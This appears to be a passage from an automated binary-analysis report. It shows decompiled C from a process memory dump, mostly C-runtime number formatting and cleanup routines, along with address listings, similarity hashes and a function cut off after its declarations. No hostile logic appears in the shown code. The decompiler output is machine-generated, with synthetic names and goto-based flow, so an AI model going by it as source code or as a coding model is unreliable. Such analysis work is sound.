                                                                            													_t1279 =  &(_t1279[4]);
                                                                            												} else {
                                                                            													goto L182;
                                                                            												}
                                                                            												goto L263;
                                                                            												L182:
                                                                            												_t908 = _v1908 - _v1888;
                                                                            												__eflags = _t908;
                                                                            												_v1908 = _t908;
                                                                            											} while (_t908 != 0);
                                                                            											_t1102 = _v1896;
                                                                            											goto L184;
                                                                            										}
                                                                            									}
                                                                            									L263:
                                                                            									_t1196 = _v1920;
                                                                            									_t1245 = _t1196;
                                                                            									_t1086 = _v472;
                                                                            									_v1872 = _t1245;
                                                                            									__eflags = _t1086;
                                                                            									if(_t1086 != 0) {
                                                                            										_t1249 = 0;
                                                                            										_t1200 = 0;
                                                                            										__eflags = 0;
                                                                            										do {
                                                                            											_t841 =  *(_t1273 + _t1200 * 4 - 0x1d0);
                                                                            											_t1153 = 0xa;
                                                                            											_t1154 = _t841 * _t1153 >> 0x20;
                                                                            											 *(_t1273 + _t1200 * 4 - 0x1d0) = _t841 * _t1153 + _t1249;
                                                                            											asm("adc edx, 0x0");
                                                                            											_t1200 = _t1200 + 1;
                                                                            											_t1249 = _t1154;
                                                                            											__eflags = _t1200 - _t1086;
                                                                            										} while (_t1200 != _t1086);
                                                                            										_v1896 = _t1249;
                                                                            										__eflags = _t1249;
                                                                            										_t1245 = _v1872;
                                                                            										if(_t1249 != 0) {
                                                                            											_t1095 = _v472;
                                                                            											__eflags = _t1095 - 0x73;
                                                                            											if(_t1095 >= 0x73) {
                                                                            												__eflags = 0;
                                                                            												_v2408 = 0;
                                                                            												_v472 = 0;
                                                                            												E001BAA64( &_v468, _t1064,  &_v2404, 0);
                                                                            												_t1279 =  &(_t1279[4]);
                                                                            											} else {
                                                                            												 *(_t1273 + _t1095 * 4 - 0x1d0) = _t1154;
                                                                            												_v472 = _v472 + 1;
                                                                            											}
                                                                            										}
                                                                            										_t1196 = _t1245;
                                                                            									}
                                                                            									_t815 = E001BC0B0( &_v472,  &_v936);
                                                                            									_t1146 = 0xa;
                                                                            									__eflags = _t815 - _t1146;
                                                                            									if(_t815 != _t1146) {
                                                                            										__eflags = _t815;
                                                                            										if(_t815 != 0) {
                                                                            											_t816 = _t815 + 0x30;
                                                                            											__eflags = _t816;
                                                                            											_t1245 = _t1196 + 1;
                                                                            											 *_t1196 = _t816;
                                                                            											_v1872 = _t1245;
                                                                            											goto L282;
                                                                            										} else {
                                                                            											_t817 = _v1904 - 1;
                                                                            										}
                                                                            									} else {
                                                                            										_v1904 = _v1904 + 1;
                                                                            										_t1245 = _t1196 + 1;
                                                                            										_t832 = _v936;
                                                                            										 *_t1196 = 0x31;
                                                                            										_v1872 = _t1245;
                                                                            										__eflags = _t832;
                                                                            										if(_t832 != 0) {
                                                                            											_t1199 = 0;
                                                                            											_t1248 = _t832;
                                                                            											_t1094 = 0;
                                                                            											__eflags = 0;
                                                                            											do {
                                                                            												_t833 =  *(_t1273 + _t1094 * 4 - 0x3a0);
                                                                            												 *(_t1273 + _t1094 * 4 - 0x3a0) = _t833 * _t1146 + _t1199;
                                                                            												asm("adc edx, 0x0");
                                                                            												_t1094 = _t1094 + 1;
                                                                            												_t1199 = _t833 * _t1146 >> 0x20;
                                                                            												_t1146 = 0xa;
                                                                            												__eflags = _t1094 - _t1248;
                                                                            											} while (_t1094 != _t1248);
                                                                            											_t1245 = _v1872;
                                                                            											__eflags = _t1199;
                                                                            											if(_t1199 != 0) {
                                                                            												_t836 = _v936;
                                                                            												__eflags = _t836 - 0x73;
                                                                            												if(_t836 >= 0x73) {
                                                                            													_v2408 = 0;
                                                                            													_v936 = 0;
                                                                            													E001BAA64( &_v932, _t1064,  &_v2404, 0);
                                                                            													_t1279 =  &(_t1279[4]);
                                                                            												} else {
                                                                            													 *(_t1273 + _t836 * 4 - 0x3a0) = _t1199;
                                                                            													_v936 = _v936 + 1;
                                                                            												}
                                                                            											}
                                                                            										}
                                                                            										L282:
                                                                            										_t817 = _v1904;
                                                                            									}
                                                                            									 *((intOrPtr*)(_v1924 + 4)) = _t817;
                                                                            									_t1070 = _v1916;
                                                                            									__eflags = _t817;
                                                                            									if(_t817 >= 0) {
                                                                            										__eflags = _t1070 - 0x7fffffff;
                                                                            										if(_t1070 <= 0x7fffffff) {
                                                                            											_t1070 = _t1070 + _t817;
                                                                            											__eflags = _t1070;
                                                                            										}
                                                                            									}
                                                                            									_t819 = _a24 - 1;
                                                                            									__eflags = _t819 - _t1070;
                                                                            									if(_t819 >= _t1070) {
                                                                            										_t819 = _t1070;
                                                                            									}
                                                                            									_t755 = _t819 + _v1920;
                                                                            									_v1916 = _t755;
                                                                            									__eflags = _t1245 - _t755;
                                                                            									if(__eflags != 0) {
                                                                            										while(1) {
                                                                            											_t755 = _v472;
                                                                            											__eflags = _t755;
                                                                            											if(__eflags == 0) {
                                                                            												goto L303;
                                                                            											}
                                                                            											_t1197 = 0;
                                                                            											_t1246 = _t755;
                                                                            											_t1090 = 0;
                                                                            											__eflags = 0;
                                                                            											do {
                                                                            												_t820 =  *(_t1273 + _t1090 * 4 - 0x1d0);
                                                                            												 *(_t1273 + _t1090 * 4 - 0x1d0) = _t820 * 0x3b9aca00 + _t1197;
                                                                            												asm("adc edx, 0x0");
                                                                            												_t1090 = _t1090 + 1;
                                                                            												_t1197 = _t820 * 0x3b9aca00 >> 0x20;
                                                                            												__eflags = _t1090 - _t1246;
                                                                            											} while (_t1090 != _t1246);
                                                                            											_t1247 = _v1872;
                                                                            											__eflags = _t1197;
                                                                            											if(_t1197 != 0) {
                                                                            												_t826 = _v472;
                                                                            												__eflags = _t826 - 0x73;
                                                                            												if(_t826 >= 0x73) {
                                                                            													__eflags = 0;
                                                                            													_v2408 = 0;
                                                                            													_v472 = 0;
                                                                            													E001BAA64( &_v468, _t1064,  &_v2404, 0);
                                                                            													_t1279 =  &(_t1279[4]);
                                                                            												} else {
                                                                            													 *(_t1273 + _t826 * 4 - 0x1d0) = _t1197;
                                                                            													_v472 = _v472 + 1;
                                                                            												}
                                                                            											}
                                                                            											_t825 = E001BC0B0( &_v472,  &_v936);
                                                                            											_t1198 = 8;
                                                                            											_t1070 = _v1916 - _t1247;
                                                                            											__eflags = _t1070;
                                                                            											do {
                                                                            												_t708 = _t825 % _v1912;
                                                                            												_t825 = _t825 / _v1912;
                                                                            												_t1151 = _t708 + 0x30;
                                                                            												__eflags = _t1070 - _t1198;
                                                                            												if(_t1070 >= _t1198) {
                                                                            													 *((char*)(_t1198 + _t1247)) = _t1151;
                                                                            												}
                                                                            												_t1198 = _t1198 - 1;
                                                                            												__eflags = _t1198 - 0xffffffff;
                                                                            											} while (_t1198 != 0xffffffff);
                                                                            											__eflags = _t1070 - 9;
                                                                            											if(_t1070 > 9) {
                                                                            												_t1070 = 9;
                                                                            											}
                                                                            											_t1245 = _t1247 + _t1070;
                                                                            											_v1872 = _t1245;
                                                                            											__eflags = _t1245 - _v1916;
                                                                            											if(__eflags != 0) {
                                                                            												continue;
                                                                            											}
                                                                            											goto L303;
                                                                            										}
                                                                            									}
                                                                            									L303:
                                                                            									 *_t1245 = 0;
                                                                            									goto L309;
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            				} else {
                                                                            					_t1070 = _t1236 & 0x000fffff;
                                                                            					if((_t1188 | _t1236 & 0x000fffff) != 0) {
                                                                            						goto L5;
                                                                            					} else {
                                                                            						_push(0x1c6ac4);
                                                                            						 *((intOrPtr*)(_v1924 + 4)) =  *(_v1924 + 4) & 0x00000000;
                                                                            						L308:
                                                                            						_push(_a24);
                                                                            						_push(_t1055);
                                                                            						if(E001B79F6() != 0) {
                                                                            							_push(0);
                                                                            							_push(0);
                                                                            							_push(0);
                                                                            							_push(0);
                                                                            							_push(0);
                                                                            							E001B7DBB();
                                                                            							asm("int3");
                                                                            							E001AE2F0(_t1142, 0x1ca9e8, 0x10);
                                                                            							_v32 = _v32 & 0x00000000;
                                                                            							E001B9931(8);
                                                                            							_pop(_t1071);
                                                                            							_t721 =  &_v8;
                                                                            							 *_t721 = _v8 & 0x00000000;
                                                                            							__eflags =  *_t721;
                                                                            							_t1237 = 3;
                                                                            							while(1) {
                                                                            								_v36 = _t1237;
                                                                            								__eflags = _t1237 -  *0x1f0404; // 0x200
                                                                            								if(__eflags == 0) {
                                                                            									break;
                                                                            								}
                                                                            								_t763 =  *0x1f0408; // 0x0
                                                                            								_t764 =  *(_t763 + _t1237 * 4);
                                                                            								__eflags = _t764;
                                                                            								if(_t764 != 0) {
                                                                            									__eflags =  *(_t764 + 0xc) >> 0x0000000d & 0x00000001;
                                                                            									if(__eflags != 0) {
                                                                            										_t773 =  *0x1f0408; // 0x0
                                                                            										_push( *((intOrPtr*)(_t773 + _t1237 * 4)));
                                                                            										_t774 = E001BEC83(_t1071, _t1142, __eflags);
                                                                            										__eflags = _t774 - 0xffffffff;
                                                                            										if(_t774 != 0xffffffff) {
                                                                            											_t731 =  &_v32;
                                                                            											 *_t731 = _v32 + 1;
                                                                            											__eflags =  *_t731;
                                                                            										}
                                                                            									}
                                                                            									_t767 =  *0x1f0408; // 0x0
                                                                            									DeleteCriticalSection( *((intOrPtr*)(_t767 + _t1237 * 4)) + 0x20);
                                                                            									_t770 =  *0x1f0408; // 0x0
                                                                            									E001B7A50( *((intOrPtr*)(_t770 + _t1237 * 4)));
                                                                            									_pop(_t1071);
                                                                            									_t772 =  *0x1f0408; // 0x0
                                                                            									_t737 = _t772 + _t1237 * 4;
                                                                            									 *_t737 =  *(_t772 + _t1237 * 4) & 0x00000000;
                                                                            									__eflags =  *_t737;
                                                                            								}
                                                                            								_t1237 = _t1237 + 1;
                                                                            							}
                                                                            							_v8 = 0xfffffffe;
                                                                            							E001BD991();
                                                                            							return E001AE336(_t1142);
                                                                            						} else {
                                                                            							L309:
                                                                            							_t1286 = _v1936;
                                                                            							if(_v1936 != 0) {
                                                                            								_t755 = E001BDFE5(_t1070, _t1286,  &_v1944);
                                                                            							}
                                                                            							return E001AE203(_t755, _v8 ^ _t1273);
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            			}
                                                                            0x001bcb33
                                                                            0x001bcb3c
                                                                            0x001bcb3f
                                                                            0x001bcb41
                                                                            0x001bcb43
                                                                            0x001bcb49
                                                                            0x001bcb4f
                                                                            0x001bcb51
                                                                            0x001bcb51
                                                                            0x001bcb51
                                                                            0x001bcb58
                                                                            0x001bcb58
                                                                            0x001bcb5a
                                                                            0x001bcb66
                                                                            0x001bcb66
                                                                            0x001bcb66
                                                                            0x001bcb5c
                                                                            0x001bcb5e
                                                                            0x001bcb5e
                                                                            0x001bcb6d
                                                                            0x001bcb70
                                                                            0x001bcb72
                                                                            0x001bcb79
                                                                            0x001bcb79
                                                                            0x001bcb74
                                                                            0x001bcb74
                                                                            0x001bcb74
                                                                            0x001bcb81
                                                                            0x001bcb8c
                                                                            0x001bcb92
                                                                            0x001bcb93
                                                                            0x001bcb98
                                                                            0x001bcb9e
                                                                            0x001bcba1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001bcba3
                                                                            0x001bcba3
                                                                            0x001bcbad
                                                                            0x001bcbb8
                                                                            0x001bcbc0
                                                                            0x001bcbc6
                                                                            0x001bcbd1
                                                                            0x001bcbd7
                                                                            0x001bcbde
                                                                            0x001bcbf1
                                                                            0x001bcbf8
                                                                            0x001bcbf8
                                                                            0x00000000
                                                                            0x001bcb25
                                                                            0x001bcb0b
                                                                            0x00000000
                                                                            0x001bcb03
                                                                            0x001bcd40
                                                                            0x001bcd40
                                                                            0x001bcd46
                                                                            0x001bcd4b
                                                                            0x001bcd51
                                                                            0x001bcd64
                                                                            0x001bcd69
                                                                            0x001bc6ee
                                                                            0x001bc6ee
                                                                            0x001bc6f7
                                                                            0x001bc6f8
                                                                            0x001bc702
                                                                            0x001bc708
                                                                            0x001bc70a
                                                                            0x001bc910
                                                                            0x001bc918
                                                                            0x001bc91b
                                                                            0x001bc920
                                                                            0x001bc923
                                                                            0x001bc92b
                                                                            0x001bc92f
                                                                            0x001bc935
                                                                            0x001bc93b
                                                                            0x001bc940
                                                                            0x001bc947
                                                                            0x001bc948
                                                                            0x001bc948
                                                                            0x001bc948
                                                                            0x001bc94f
                                                                            0x001bc952
                                                                            0x001bc95a
                                                                            0x001bc960
                                                                            0x001bc965
                                                                            0x001bc965
                                                                            0x001bc962
                                                                            0x001bc962
                                                                            0x001bc962
                                                                            0x001bc969
                                                                            0x001bc96a
                                                                            0x001bc96c
                                                                            0x001bc96f
                                                                            0x001bc975
                                                                            0x001bc97b
                                                                            0x001bc97e
                                                                            0x001bc981
                                                                            0x001bc987
                                                                            0x001bc98a
                                                                            0x001bc98d
                                                                            0x001bc997
                                                                            0x001bc997
                                                                            0x001bc997
                                                                            0x001bc98f
                                                                            0x001bc98f
                                                                            0x001bc991
                                                                            0x00000000
                                                                            0x001bc993
                                                                            0x001bc993
                                                                            0x001bc993
                                                                            0x001bc991
                                                                            0x001bc999
                                                                            0x001bc99b
                                                                            0x001bca8d
                                                                            0x001bca8d
                                                                            0x001bca8f
                                                                            0x001bca95
                                                                            0x001bca9b
                                                                            0x001bcab0
                                                                            0x001bcab5
                                                                            0x001bc9a1
                                                                            0x001bc9a1
                                                                            0x001bc9a3
                                                                            0x00000000
                                                                            0x001bc9a9
                                                                            0x001bc9ab
                                                                            0x001bc9ac
                                                                            0x001bc9ae
                                                                            0x001bc9b0
                                                                            0x001bc9b2
                                                                            0x001bc9b2
                                                                            0x001bc9b8
                                                                            0x001bc9ba
                                                                            0x001bc9c0
                                                                            0x001bc9c3
                                                                            0x001bc9d1
                                                                            0x001bc9d7
                                                                            0x001bc9d7
                                                                            0x001bc9d9
                                                                            0x001bc9dc
                                                                            0x001bc9e2
                                                                            0x001bc9e2
                                                                            0x001bc9e4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001bc9e6
                                                                            0x001bc9e8
                                                                            0x001bc9ee
                                                                            0x001bc9ee
                                                                            0x001bc9ea
                                                                            0x001bc9ea
                                                                            0x001bc9ea
                                                                            0x001bc9f3
                                                                            0x001bc9f5
                                                                            0x001bc9fc
                                                                            0x001bc9fc
                                                                            0x001bc9f7
                                                                            0x001bc9f7
                                                                            0x001bc9f7
                                                                            0x001bca22
                                                                            0x001bca28
                                                                            0x001bca2b
                                                                            0x001bca31
                                                                            0x001bca38
                                                                            0x001bca39
                                                                            0x001bca3a
                                                                            0x001bca40
                                                                            0x001bca43
                                                                            0x001bca45
                                                                            0x00000000
                                                                            0x001bca45
                                                                            0x00000000
                                                                            0x001bca43
                                                                            0x001bca4d
                                                                            0x001bca53
                                                                            0x001bca5b
                                                                            0x001bca5b
                                                                            0x001bca5c
                                                                            0x001bca5e
                                                                            0x001bca62
                                                                            0x001bca6a
                                                                            0x001bca6a
                                                                            0x001bca6a
                                                                            0x001bca6c
                                                                            0x001bca73
                                                                            0x001bca78
                                                                            0x001bca85
                                                                            0x001bca7a
                                                                            0x001bca7d
                                                                            0x001bca7d
                                                                            0x001bca78
                                                                            0x001bc9a3
                                                                            0x001bcab8
                                                                            0x001bcac2
                                                                            0x001bcac8
                                                                            0x001bcace
                                                                            0x001bcad4
                                                                            0x001bc710
                                                                            0x001bc710
                                                                            0x001bc710
                                                                            0x001bc712
                                                                            0x001bc719
                                                                            0x001bc720
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001bc726
                                                                            0x001bc729
                                                                            0x001bc72c
                                                                            0x00000000
                                                                            0x001bc72e
                                                                            0x001bc736
                                                                            0x001bc73b
                                                                            0x001bc740
                                                                            0x001bc741
                                                                            0x001bc743
                                                                            0x001bc74b
                                                                            0x001bc74f
                                                                            0x001bc755
                                                                            0x001bc75b
                                                                            0x001bc760
                                                                            0x001bc767
                                                                            0x001bc767
                                                                            0x001bc768
                                                                            0x001bc76b
                                                                            0x001bc773
                                                                            0x001bc779
                                                                            0x001bc77e
                                                                            0x001bc77e
                                                                            0x001bc77b
                                                                            0x001bc77b
                                                                            0x001bc77b
                                                                            0x001bc782
                                                                            0x001bc783
                                                                            0x001bc785
                                                                            0x001bc788
                                                                            0x001bc78e
                                                                            0x001bc794
                                                                            0x001bc797
                                                                            0x001bc79a
                                                                            0x001bc7a0
                                                                            0x001bc7a3
                                                                            0x001bc7a6
                                                                            0x001bc7b0
                                                                            0x001bc7b0
                                                                            0x001bc7b0
                                                                            0x001bc7a8
                                                                            0x001bc7a8
                                                                            0x001bc7aa
                                                                            0x00000000
                                                                            0x001bc7ac
                                                                            0x001bc7ac
                                                                            0x001bc7ac
                                                                            0x001bc7aa
                                                                            0x001bc7b2
                                                                            0x001bc7b4
                                                                            0x001bc8a9
                                                                            0x001bc8a9
                                                                            0x001bc8ab
                                                                            0x001bc8b1
                                                                            0x001bc8b7
                                                                            0x001bc8cc
                                                                            0x001bc8d1
                                                                            0x001bc7ba
                                                                            0x001bc7ba
                                                                            0x001bc7bc
                                                                            0x00000000
                                                                            0x001bc7c2
                                                                            0x001bc7c4
                                                                            0x001bc7c5
                                                                            0x001bc7c7
                                                                            0x001bc7c9
                                                                            0x001bc7cb
                                                                            0x001bc7cb
                                                                            0x001bc7d1
                                                                            0x001bc7d3
                                                                            0x001bc7d9
                                                                            0x001bc7dc
                                                                            0x001bc7ea
                                                                            0x001bc7f0
                                                                            0x001bc7f0
                                                                            0x001bc7f2
                                                                            0x001bc7f5
                                                                            0x001bc7fb
                                                                            0x001bc7fb
                                                                            0x001bc7fd
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001bc7ff
                                                                            0x001bc801
                                                                            0x001bc807
                                                                            0x001bc807
                                                                            0x001bc803
                                                                            0x001bc803
                                                                            0x001bc803
                                                                            0x001bc80c
                                                                            0x001bc80e
                                                                            0x001bc81b
                                                                            0x001bc81b
                                                                            0x001bc810
                                                                            0x001bc816
                                                                            0x001bc816
                                                                            0x001bc839
                                                                            0x001bc841
                                                                            0x001bc848
                                                                            0x001bc84f
                                                                            0x001bc850
                                                                            0x001bc853
                                                                            0x001bc859
                                                                            0x001bc85f
                                                                            0x001bc862
                                                                            0x001bc864
                                                                            0x00000000
                                                                            0x001bc864
                                                                            0x00000000
                                                                            0x001bc862
                                                                            0x001bc86c
                                                                            0x001bc872
                                                                            0x001bc872
                                                                            0x001bc878
                                                                            0x001bc87a
                                                                            0x001bc884
                                                                            0x001bcd9d
                                                                            0x001bcd9d
                                                                            0x001bcda0
                                                                            0x001bcda4
                                                                            0x001bcda4
                                                                            0x001bcda5
                                                                            0x001bcdb7
                                                                            0x001bcdc4
                                                                            0x001bcdd3
                                                                            0x001bcdfd
                                                                            0x001bce02
                                                                            0x001bce08
                                                                            0x001bce0b
                                                                            0x001bce11
                                                                            0x001bce14
                                                                            0x001bce90
                                                                            0x001bce97
                                                                            0x001bcf5b
                                                                            0x001bcf61
                                                                            0x001bcf67
                                                                            0x001bcf6a
                                                                            0x001bcf6c
                                                                            0x001bcff5
                                                                            0x001bcf72
                                                                            0x001bcf72
                                                                            0x001bcf78
                                                                            0x001bcf78
                                                                            0x001bcf7e
                                                                            0x001bcf84
                                                                            0x001bcf86
                                                                            0x001bcf88
                                                                            0x001bcf88
                                                                            0x001bcf8e
                                                                            0x001bcf94
                                                                            0x001bcf96
                                                                            0x001bcf9e
                                                                            0x001bcf9e
                                                                            0x001bcfa4
                                                                            0x001bcfa6
                                                                            0x001bcfa8
                                                                            0x001bcfae
                                                                            0x001bcfb0
                                                                            0x001bd0c7
                                                                            0x001bd0c9
                                                                            0x001bd0cf
                                                                            0x001bd0cf
                                                                            0x00000000
                                                                            0x001bcfb6
                                                                            0x001bcfbc
                                                                            0x001bcfbc
                                                                            0x001bcfbe
                                                                            0x001bcfc4
                                                                            0x001bcfc7
                                                                            0x001bcfce
                                                                            0x001bcfd4
                                                                            0x001bcfd6
                                                                            0x001bcffd
                                                                            0x001bcfff
                                                                            0x001bd001
                                                                            0x001bd003
                                                                            0x001bd009
                                                                            0x001bd00f
                                                                            0x001bd0a9
                                                                            0x001bd0a9
                                                                            0x001bd0ac
                                                                            0x00000000
                                                                            0x001bd0b2
                                                                            0x001bd0b2
                                                                            0x001bd0b8
                                                                            0x00000000
                                                                            0x001bd0b8
                                                                            0x001bd015
                                                                            0x001bd015
                                                                            0x001bd015
                                                                            0x001bd018
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001bd01a
                                                                            0x001bd01c
                                                                            0x001bd01e
                                                                            0x001bd027
                                                                            0x001bd027
                                                                            0x001bd029
                                                                            0x001bd02f
                                                                            0x001bd02f
                                                                            0x001bd03b
                                                                            0x001bd046
                                                                            0x001bd049
                                                                            0x001bd056
                                                                            0x001bd059
                                                                            0x001bd05a
                                                                            0x001bd05b
                                                                            0x001bd061
                                                                            0x001bd063
                                                                            0x001bd069
                                                                            0x001bd06f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001bd071
                                                                            0x001bd071
                                                                            0x001bd071
                                                                            0x001bd073
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001bd075
                                                                            0x001bd078
                                                                            0x001bd132
                                                                            0x001bd132
                                                                            0x001bd134
                                                                            0x001bd13a
                                                                            0x001bd140
                                                                            0x001bd141
                                                                            0x00000000
                                                                            0x001bd07e
                                                                            0x001bd07e
                                                                            0x001bd080
                                                                            0x001bd082
                                                                            0x001bd082
                                                                            0x001bd082
                                                                            0x001bd08a
                                                                            0x001bd08d
                                                                            0x001bd08d
                                                                            0x001bd093
                                                                            0x001bd095
                                                                            0x001bd097
                                                                            0x001bd09e
                                                                            0x001bd0a4
                                                                            0x001bd0a6
                                                                            0x00000000
                                                                            0x001bd0a6
                                                                            0x00000000
                                                                            0x001bd078
                                                                            0x00000000
                                                                            0x001bd071
                                                                            0x00000000
                                                                            0x001bd015
                                                                            0x001bcfd8
                                                                            0x001bcfd8
                                                                            0x001bcfda
                                                                            0x001bcfe0
                                                                            0x001bcfe7
                                                                            0x001bcfe7
                                                                            0x001bcfea
                                                                            0x001bcfea
                                                                            0x00000000
                                                                            0x001bcfda
                                                                            0x00000000
                                                                            0x001bd0be
                                                                            0x001bd0be
                                                                            0x001bd0bf
                                                                            0x001bd0bf
                                                                            0x00000000
                                                                            0x001bcfc4
                                                                            0x001bce9d
                                                                            0x001bce9d
                                                                            0x001bceaf
                                                                            0x001bcebe
                                                                            0x001bcec3
                                                                            0x001bcec6
                                                                            0x001bcec8
                                                                            0x001bcee4
                                                                            0x001bcee7
                                                                            0x00000000
                                                                            0x001bceed
                                                                            0x001bceed
                                                                            0x001bcef4
                                                                            0x00000000
                                                                            0x001bcefa
                                                                            0x001bcf00
                                                                            0x001bcf02
                                                                            0x001bcf08
                                                                            0x001bcf08
                                                                            0x001bcf0a
                                                                            0x001bcf0a
                                                                            0x001bcf0c
                                                                            0x001bcf15
                                                                            0x001bcf1c
                                                                            0x001bcf1f
                                                                            0x001bcf20
                                                                            0x001bcf22
                                                                            0x001bcf22
                                                                            0x00000000
                                                                            0x001bcf0a
                                                                            0x001bcef4
                                                                            0x001bceca
                                                                            0x001bcecc
                                                                            0x001bced2
                                                                            0x001bced8
                                                                            0x001bced9
                                                                            0x00000000
                                                                            0x001bced9
                                                                            0x001bcec8
                                                                            0x001bce16
                                                                            0x001bce16
                                                                            0x001bce1c
                                                                            0x001bce1e
                                                                            0x001bce33
                                                                            0x001bce36
                                                                            0x00000000
                                                                            0x001bce3c
                                                                            0x001bce3c
                                                                            0x001bce43
                                                                            0x00000000
                                                                            0x001bce49
                                                                            0x001bce4f
                                                                            0x001bce51
                                                                            0x001bce57
                                                                            0x001bce57
                                                                            0x001bce59
                                                                            0x001bce59
                                                                            0x001bce5b
                                                                            0x001bce64
                                                                            0x001bce6b
                                                                            0x001bce6e
                                                                            0x001bce6f
                                                                            0x001bce71
                                                                            0x001bce71
                                                                            0x001bcf2a
                                                                            0x001bcf2a
                                                                            0x001bcf2c
                                                                            0x00000000
                                                                            0x001bcf32
                                                                            0x001bcf32
                                                                            0x001bcf38
                                                                            0x001bcf3b
                                                                            0x001bce7e
                                                                            0x001bce85
                                                                            0x00000000
                                                                            0x001bcf41
                                                                            0x001bcf43
                                                                            0x001bcf49
                                                                            0x001bcf4f
                                                                            0x001bcf50
                                                                            0x001bd147
                                                                            0x001bd147
                                                                            0x001bd14e
                                                                            0x001bd14f
                                                                            0x001bd150
                                                                            0x001bd155
                                                                            0x001bd158
                                                                            0x001bd158
                                                                            0x001bcf3b
                                                                            0x001bcf2c
                                                                            0x001bce43
                                                                            0x001bce20
                                                                            0x001bce20
                                                                            0x001bce22
                                                                            0x001bce28
                                                                            0x001bd0d2
                                                                            0x001bd0d2
                                                                            0x001bd0d3
                                                                            0x001bd0d9
                                                                            0x001bd0d9
                                                                            0x001bd0e0
                                                                            0x001bd0e1
                                                                            0x001bd0e2
                                                                            0x001bd0e7
                                                                            0x001bd0ea
                                                                            0x001bd0ea
                                                                            0x001bd0ea
                                                                            0x001bce1e
                                                                            0x001bd0ec
                                                                            0x001bd0ec
                                                                            0x001bd0ee
                                                                            0x001bd15c
                                                                            0x001bd163
                                                                            0x001bd163
                                                                            0x001bd163
                                                                            0x001bd16a
                                                                            0x001bd16c
                                                                            0x001bd172
                                                                            0x001bd173
                                                                            0x001bd61f
                                                                            0x001bd61f
                                                                            0x001bd620
                                                                            0x001bd621
                                                                            0x001bd626
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001bd0f0
                                                                            0x001bd0f6
                                                                            0x001bd0f6
                                                                            0x001bd0fc
                                                                            0x001bd0fc
                                                                            0x001bd108
                                                                            0x00000000
                                                                            0x001bd108
                                                                            0x001bcd97
                                                                            0x001bd629
                                                                            0x001bd629
                                                                            0x001bd62f
                                                                            0x001bd631
                                                                            0x001bd637
                                                                            0x001bd63d
                                                                            0x001bd63f
                                                                            0x001bd641
                                                                            0x001bd643
                                                                            0x001bd643
                                                                            0x001bd645
                                                                            0x001bd645
                                                                            0x001bd64e
                                                                            0x001bd64f
                                                                            0x001bd653
                                                                            0x001bd65a
                                                                            0x001bd65d
                                                                            0x001bd65e
                                                                            0x001bd660
                                                                            0x001bd660
                                                                            0x001bd664
                                                                            0x001bd66a
                                                                            0x001bd66c
                                                                            0x001bd672
                                                                            0x001bd674
                                                                            0x001bd67a
                                                                            0x001bd67d
                                                                            0x001bd690
                                                                            0x001bd693
                                                                            0x001bd699

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: __floor_pentium4
                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                            • API String ID: 4168288129-2761157908
                                                                            • Opcode ID: f0243807fa5acf9e63597cc927f61a715ad9e06e3ec411abfe254f9477780328
                                                                            • Instruction ID: a35bed0030ffb5a170b63a4f8cb90747b26ccc32a948738536743b0431c3834a
                                                                            • Opcode Fuzzy Hash: f0243807fa5acf9e63597cc927f61a715ad9e06e3ec411abfe254f9477780328
                                                                            • Instruction Fuzzy Hash: 2DC24D71E086298FDB29DF28DD407EAB7B5EB98305F1541EAD44DE7240E774AE818F80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 93%
                                                                            			E00192692(intOrPtr* __ecx, void* __eflags) {
                                                                            				void* __ebp;
                                                                            				unsigned int _t333;
                                                                            				signed int _t337;
                                                                            				char _t356;
                                                                            				signed short _t363;
                                                                            				signed int _t368;
                                                                            				signed int _t374;
                                                                            				signed char _t376;
                                                                            				signed char _t379;
                                                                            				char _t396;
                                                                            				signed int _t397;
                                                                            				signed int _t401;
                                                                            				signed char _t415;
                                                                            				intOrPtr _t416;
                                                                            				char _t417;
                                                                            				signed int _t420;
                                                                            				signed int _t421;
                                                                            				signed char _t426;
                                                                            				signed int _t429;
                                                                            				signed int _t433;
                                                                            				signed short _t438;
                                                                            				signed short _t443;
                                                                            				unsigned int _t448;
                                                                            				signed int _t451;
                                                                            				void* _t454;
                                                                            				signed int _t456;
                                                                            				signed int _t459;
                                                                            				void* _t466;
                                                                            				signed int _t472;
                                                                            				unsigned int _t476;
                                                                            				void* _t477;
                                                                            				void* _t484;
                                                                            				void* _t485;
                                                                            				signed char _t491;
                                                                            				signed int _t505;
                                                                            				intOrPtr* _t518;
                                                                            				signed int _t521;
                                                                            				signed int _t522;
                                                                            				intOrPtr* _t523;
                                                                            				signed int _t531;
                                                                            				signed int _t536;
                                                                            				signed int _t538;
                                                                            				unsigned int _t547;
                                                                            				signed int _t549;
                                                                            				signed int _t560;
                                                                            				signed char _t562;
                                                                            				signed int _t563;
                                                                            				void* _t586;
                                                                            				signed int _t590;
                                                                            				signed int _t602;
                                                                            				signed int _t604;
                                                                            				signed int _t606;
                                                                            				unsigned int _t612;
                                                                            				signed char _t628;
                                                                            				signed char _t638;
                                                                            				signed int _t641;
                                                                            				unsigned int _t642;
                                                                            				signed int _t645;
                                                                            				signed int _t646;
                                                                            				signed int _t648;
                                                                            				signed int _t649;
                                                                            				unsigned int _t651;
                                                                            				signed int _t655;
                                                                            				void* _t656;
                                                                            				void* _t663;
